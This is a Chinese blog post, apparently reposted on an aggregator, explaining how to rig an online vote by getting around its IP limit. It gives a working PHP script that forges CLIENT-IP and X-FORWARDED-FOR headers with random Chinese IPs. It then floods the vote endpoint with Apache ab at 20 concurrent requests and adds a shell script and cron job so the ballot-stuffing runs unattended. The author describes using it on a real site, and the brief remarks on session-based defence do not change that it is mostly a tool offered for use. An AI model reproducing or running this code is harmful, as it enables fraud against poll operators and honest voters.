投票扣积分php系统,关于投票系统刷票形式原理(突破ip限制刷票PHP版)
关于投票系统刷票方式原理(突破ip限制刷票PHP版)
先说一点:其实不算是突破ip限制,因为事实上,这个限制是在服务器端的,客户端在牛逼,也突破不了..只是可以一直刷多次票罢了
一个朋友突然发了一个网站,让我帮她投投票..我这人一项比较好说话,就帮她投了.顺便分析了这个网站,发现这个网站的投票系统有ip限制,但是投票是一个ajax请求.那么办法就出来了.
很多投票PC网站都是依靠限制ip,来限制投票人数.那么我用curl伪造IP,那么就可以轻易制造多个IP进行投票.
下面贴上PHP代码:
由于对方是GET AJAX请求,我这里就贴上GET方法,POST方法请自行修改
/**
* @author 邹颢zouhao619@gmail.com
*/
$ip_long = array(
array('607649792', '608174079'), //36.56.0.0-36.63.255.255
array('1038614528', '1039007743'), //61.232.0.0-61.237.255.255
array('1783627776', '1784676351'), //106.80.0.0-106.95.255.255
array('2035023872', '2035154943'), //121.76.0.0-121.77.255.255
array('2078801920', '2079064063'), //123.232.0.0-123.235.255.255
array('-1950089216', '-1948778497'), //139.196.0.0-139.215.255.255
array('-1425539072', '-1425014785'), //171.8.0.0-171.15.255.255
array('-1236271104', '-1235419137'), //182.80.0.0-182.92.255.255
array('-770113536', '-768606209'), //210.25.0.0-210.47.255.255
array('-569376768', '-564133889'), //222.16.0.0-222.95.255.255
);
$rand_key = mt_rand(0, 9);
$ip= long2ip(mt_rand($ip_long[$rand_key][0], $ip_long[$rand_key][1]));//随机生成国内某个ip
$url='localhost/ip.php';//这里请填写投票的请求地址
$ch = curl_init($url);
$header = array(
"CLIENT-IP:{$ip}",
"X-FORWARDED-FOR:{$ip}",
);
curl_setopt($ch,CURLOPT_HTTPHEADER,$header);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ; // 获取数据返回
curl_exec($ch);
curl_close($ch);
前部分是随机生成国内的某个ip,然后用curl模拟请求.
由于网站限制是一个ip限制1个小时投30个票,因此,我这里就是随机的.
如果网站是限制1个ip投1个,那么最好把ip修改为顺序生成国内ip,这样可以不重复.
然后我在开启,apache ab,每次并发20个投票..很快票就刷上去了.
那么面对这样的恶意刷票有什么解决办法呢?
我没有什么好的办法防御.但是我这样的curl实际上就是webservice访问,这样的访问是不带session或者cookie的,当然,curl也可以模拟带上cookie,然后在带上phpsessionid从而来带上session.
但是对于一个未知网站而言,并不知道他的处理方式.因此,如果判断是否存在session会有效抵挡一批刷票.但是在提示的时候切勿提示是缺少session这样的文字.最好在给session一个有效时期,这样的安全度会提高(但是如果刷票者知道这样的原理,并不意味能防御住他)
补充一点:很多代码上说能够获取访问者真实的IP地址,这个我没有遇过到正确的能够获取用户真实ip的方法.如果有的话,欢迎留言
如果有什么好的防御方案,希望留言.
有时候如果超时可能会导致脚本中断,最好在配合一个crond来每分钟都执行一下脚本
脚本代码为:
#!/bin/sh
pid=`ps -ef |grep localhost/vote.php |grep vote.php | awk '{print $2}'`;
if [[ $pid == "" ]];then
echo "vote is start";
nohup /usr/bin/ab -n 100000 -c 20 http://localhost/vote.php
else
echo "vote.php is running";
fi
这个脚本就是每分钟判断这个进程存在不,存在的话,就不管,不存在的话,就启动这个进程..
另外可以不用使用nohup来后台执行
在开启crond每分钟跑起来
crontab -e
编辑crond任务
* * * * * /www/web/default/Controller/Script/vote.sh
前5个*号就是代表每个分钟都执行这个脚本..如果不详,请查阅cron资料
在开启cron
service crond start
大工告成,安心让他自动刷吧.你可以去忙别的事了
Windows系统请自行计划任务,我这里就不帖代码了
投票扣积分php系统,关于投票系统刷票形式原理(突破ip限制刷票PHP版)相关推荐
- 关于投票系统刷票方式原理(突破ip限制刷票PHP版)
先说一点:其实不算是突破ip限制,因为事实上,这个限制是在服务器端的,客户端在牛逼,也突破不了..只是可以一直刷多次票罢了 一个朋友突然发了一个网站,让我帮她投投票..我这人一项比较好说话,就帮她投了 ...
- java 自动投票 httpclient ip_投票系统刷票方式原理(突破ip限制刷票PHP版)
先说一点:其实不算是突破ip限制,因为事实上,这个限制是在服务器端的,客户端在牛逼,也突破不了..只是可以一直刷多次票罢了 一个朋友突然发了一个网站,让我帮她投投票..我这人一项比较好说话,就帮她投了 ...
- php投票ip限制的二维表,关于投票系统刷票方式原理(突破ip限制刷票PHP版)
先说一点:其实不算是突破ip限制,因为事实上,这个限制是在服务器端的,客户端在牛逼,也突破不了..只是可以一直刷多次票罢了 一个朋友突然发了一个网站,让我帮她投投票..我这人一项比较好说话,就帮她投了 ...
- 在投票系统方法的原则刷票(突破ip限制刷票PHP版)
让我谈一点:事实上,没有一个突破ip限制,因为实际上,,这项限制server结束,client牛逼,不能突破..只要是能够始终重复刷票罢了 一个朋友突然来了个网站,让我帮她投票..我是一个更好的人说话 ...
- mysql网络投票系统设计_分享PHP+MySQL投票系统的设计和实现
PHP+MySQL是初学者开发的简单操作系统.PHP+MySQL系统是一个基于网络的网站投票程序.下面成都人的seo技术频道编辑介绍共享PHP+MySQL投票系统的设计与实现.让我们看看 数据库设计 ...
- 简易在线投票系统(php)——投票页面
登陆后才可以进入投票页面,否则将自动回到主页.投票页面分为多选和单选两种形式.在投票完成后根据投票活动发布时设置的是否允许查看结果来确定是否自动跳转到结果页面.若不允许,会自动弹出提示框,并返回主页. ...
- 活动星投票乡村振兴案例网络评选投票小程序简单便捷的投票系统
用户在使用微信投票的时候,需要功能齐全,又快捷方便的投票小程序. 而"活动星投票"这款软件使用非常的方便,用户可以随时使用手机微信小程序获得线上投票服务,很多用户都很喜欢" ...
- matlab用卷积积分求单自由度阻尼系统响应(零极点模型)
%spring1.m-用卷积积分求单自由度阻尼系统的强迫振动(先求系统的零极点模型) m=1;c=4;K=100;dt=0.015; %dt为卷积积分时的采样间隔 w0=sqrt(K/m); %固 ...
- 系统架构设计师 - 系统可靠性设计
文章目录 1 可靠性分析 故障树分析方法 失效模型及效应分析方法 2 可靠性设计原则 3 可靠性设计方法 避错设计 容错设计 恢复快设计 N版本冗余设计 冗余设计 检错设计 检错对象: 检错延时 实现 ...
最新文章
- 深度学习不是万灵药!神经网络3D重建只是图像分类
- C++用string 定义字符串数组
- 一文读懂领域迁移与领域适应的常见方法
- OpenCV使用不同的决策树decision trees的实例(附完整代码)
- 查看Python当前版本
- 英伟达3080Ti、3070Ti来了!
- sublime theme color
- 题解 AT25 【プログラミングコンテスト】
- 基于springboot+vue的交通事故案例库系统
- android中bundle的使用
- 高速路上车辆组队链接的想法
- 关于蓝桥杯的经验(本人java B 国二)
- 注意力、自注意力和多头注意力
- 第十七届时尚COSMO美容大奖盛大启动 亮点多维度升级,2020一起“美就出圈”
- python微信公众号生成专属二维码--你再也不用去求人了
- x must be 1d
- C++: 情侣最美身高差(团体程序设计天梯赛)
- 2016年美国数学建模比赛(MCM/ICM) E题环境科学 Are we heading towards a thirsty planet? 人工精准翻译。...
- 校友会小程序开发笔记六:校友活动聚会功能模块设计与实现
- 2019爪哇部落第十届新生选拔赛 题解
热门文章
- 计算机二级 学习资料 网盘分享
- wow达拉然发礼物机器人_魔兽世界43种经典变身道具获取方法
- dcom组件有excel没有word,DCOM配置中缺少Microsoft Excel应用程序条目
- 自制2.4G ELRS TX高频头, 内置于富斯i6
- 富斯,迈克,天地飞4合1接收机说明书
- 【光纤通信课程-每周一练(含答案)】第九周—波分复用系统
- qt 二次开发 研华daq_研华|数据采集|DAQNavi-告别复杂编程,研华DAQNavi让您轻松实现数据采集...
- 如何为linux kernel贡献代码
- GBoost 和 xGBoost
- 计算机图形学【GAMES-101】9、蒙特卡洛路径追踪(Path Tracing)(光源采样)